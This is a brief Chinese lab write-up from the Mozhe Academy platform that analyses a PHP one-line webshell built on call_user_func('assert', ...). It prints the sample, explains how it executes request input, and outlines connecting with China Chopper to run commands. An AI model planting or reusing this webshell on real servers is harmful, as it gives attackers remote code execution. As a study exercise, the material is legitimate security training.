webshell代码分析溯源
一、一句话变形马样本
<?php
call_user_func(‘assert’, $_request[‘assert’]);
?>
二、代码分析
1、分析代码
call_user_func(‘assert’, $_request[‘assert’])中assert是第一个被调用的函数,
其余参数是回调函数的参数,这样就构成了assert($_request[‘assert’])一句话木马
注: call_user_func函数,把第一个参数作为回调函数,其余参数是回调函数的参数,参考:
三、漏洞环境搭建
1、这里使用在线学习平台墨者学院中的实验环境(webshell代码分析溯源(第5题)),地址: https://www.mozhe.cn/bug/detail/rdbtowfkotjiodjrwlrwujdodlcrut09bw96agumozhe
2、代码环境,下载代码
3、分析(上面已经分析过了)
4、使用菜刀连接
5、执行一些命令
黄山市民网:https://www.huangshanshimin.com/
